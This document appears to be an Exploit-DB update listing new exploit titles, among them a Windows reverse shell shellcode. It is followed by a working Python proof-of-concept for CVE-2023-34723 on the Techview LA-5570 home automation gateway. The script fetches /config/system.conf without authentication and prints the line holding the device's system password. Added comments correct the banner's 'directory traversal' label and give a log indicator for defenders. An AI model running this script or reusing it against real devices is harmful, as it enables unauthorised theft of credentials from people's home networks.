
16 changes to exploits/shellcodes/ghdb Techview LA-5570 Wireless Gateway Home Automation Controller - Multiple Vulnerabilities Axigen < 10.3.3.47_ 10.2.3.12 - Reflected XSS Drupal 10.1.2 - web-cache-poisoning-External-service-interaction Jorani v1.0.3-(c)2014-2023 - XSS Reflected & Information Disclosure soosyze 2.0.0 - File Upload SPA-Cart eCommerce CMS 1.9.0.3 - SQL Injection Wordpress Plugin Elementor 3.5.5 - Iframe Injection Wp2Fac - OS Command Injection Maltrail v0.53 - Unauthenticated Remote Code Execution (RCE) SyncBreeze 15.2.24 - 'login' Denial of Service GOM Player 2.3.90.5360 - Buffer Overflow (PoC) GOM Player 2.3.90.5360 - Remote Code Execution (RCE) Windows/x64 - PIC Null-Free TCP Reverse Shell Shellcode (476 Bytes)
# Exploit Title: Techview LA-5570 Wireless Gateway Home Automation Controller - Multiple Vulnerabilities
# Google Dork: N/A
# Date: 25/08/2023
# Exploit Author: The Security Team [exploitsecurity.io<http://exploitsecurity.io>]
# Vendor Homepage: https://www.jaycar.com.au/wireless-gateway-home-automation-controller/p/LA5570
# Software Link: N/A
# Version: 1.0.19_T53
# Tested on: MACOS/Linux
# CVE : CVE-2023-34723
# POC Code Available: https://www.exploitsecurity.io/post/cve-2023-34723-cve-2023-34724-cve-2023-34725
#!/opt/homebrew/bin/python3
import requests
import sys
from time import sleep
from urllib3.exceptions import InsecureRequestWarning
from colorama import init
from colorama import Fore, Back, Style
import re
import os
import ipaddress
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
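def banner():
    """Clear the terminal and print the tool's banner box.

    The banner shows the author, company, description and a usage line
    built from ``sys.argv[0]``.
    """
    # The original assigned clr_cmd only for 'posix' and 'nt', so any other
    # os.name value left it unbound and raised UnboundLocalError at
    # os.system(). Default to 'clear' for everything that is not Windows.
    clr_cmd = 'cls' if os.name == 'nt' else 'clear'
    # The command is a fixed literal; no user input reaches the shell here.
    os.system(clr_cmd)
    print("[+]****************************************************[+]")
    print(" | Author : The Security Team |")
    print(" | Company : " + Fore.RED + "Exploit Security" + Style.RESET_ALL + "\t\t\t|")
    print(" | Description : TechVIEW LA-5570 Directory Traversal |")
    print(" | Usage : " + sys.argv[0] + " <target> |")
    print("[+]****************************************************[+]")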
def usage():
    """Print a one-line usage hint naming the running script."""
    script_name = sys.argv[0]
    print("Usage: " + script_name + " <target>")
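def main(target):
    """Request ``/config/system.conf`` from *target* and report whether it is exposed.

    A single GET is sent to ``http://<target>/config/system.conf`` with a
    3-second timeout and no authentication. If the response body contains
    the string ``system_password``, the second line of the body is printed;
    otherwise the target is reported as not vulnerable.

    Notes for anyone using this as an exposure check (the file header ties
    it to CVE-2023-34723):

    * The banner calls this a directory traversal, but the request built
      here targets a fixed path and contains no traversal sequence.
    * A negative result only means the marker string was absent from this
      one response (any status code, any body). It does not show that the
      device is patched.
    * On the defensive side, unauthenticated GET requests for
      ``/config/system.conf`` in web or gateway logs are the observable
      trace of this check.
    * The printed line may contain a credential, so treat terminal output
      and scrollback accordingly.

    Args:
        target: Host part of the URL. The caller validates it as an IP
            address literal before passing it in.

    Returns:
        None. Results and errors are printed to stdout.
    """
    url = ("http://" + target + "/config/system.conf").strip()
    try:
        # verify=False only affects TLS certificate checks; the URL is plain
        # http, so it has no effect on this request.
        r = requests.get(url, verify=False, timeout=3)
        # Cosmetic progress dots: the response has already been received.
        print("[+] Retrieving credentials", flush=True, end='')
        for _ in range(3):
            sleep(1)
            print(" .", flush=True, end='')
        if "system_password" in r.text:
            data = r.text.split("\n")
            # NOTE(review): assumes the body has at least two lines and that
            # the second one is the line of interest. Confirm against a real
            # response; a single-line body raises IndexError here.
            print(f"\n{data[1]}")
        else:
            print(Fore.RED + "[!] Target is not vulnerable !" + Style.RESET_ALL)
    except KeyboardInterrupt:
        return
    except (TimeoutError, requests.exceptions.Timeout):
        # The two timeout handlers of the original are merged here.
        print(Fore.RED + "[!] Timeout connecting to target !" + Style.RESET_ALL)
        return
    except requests.exceptions.ConnectionError:
        # Previously unhandled: an unreachable or refusing host ended the
        # script with a traceback instead of a message.
        print(Fore.RED + "[!] Could not connect to target !" + Style.RESET_ALL)
        return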
if __name__ == '__main__':
    # Script entry point: expects exactly one meaningful argument, the target.
    if len(sys.argv) <= 1:
        print(Fore.RED + "[+] Not enough arguments, please specify target !" + Style.RESET_ALL)
    else:
        banner()
        target = sys.argv[1]
        try:
            # ip_address() raises ValueError for anything that is not an IP
            # literal, so hostnames and strings carrying extra URL characters
            # never reach the URL built in main().
            validate = ipaddress.ip_address(target)
            if validate:
                # main() stays inside the try so a ValueError raised while
                # it runs is reported by the same handler, as before.
                main(target)
        except ValueError as err:
            print(Fore.RED + "[!] " + str(err) + " !" + Style.RESET_ALL)